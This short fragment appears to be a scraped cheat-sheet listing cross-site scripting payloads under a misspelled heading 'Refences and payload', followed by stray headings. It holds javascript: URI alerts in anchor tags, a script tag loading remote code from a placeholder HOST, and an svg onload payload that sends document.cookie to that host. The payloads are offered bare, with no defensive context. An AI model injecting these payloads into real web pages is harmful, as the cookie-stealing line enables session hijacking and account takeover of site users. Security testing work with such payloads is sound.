Refences and payload
In an attribute
<a src="javascript:alert('XSS');">click me</a> <a src="javascript:alert(/XSS/);">click me</a> <script src=//HOST/1.js></script> <svg onload=fetch('//HOST/?cookie='+document.cookie)>
Social media
Web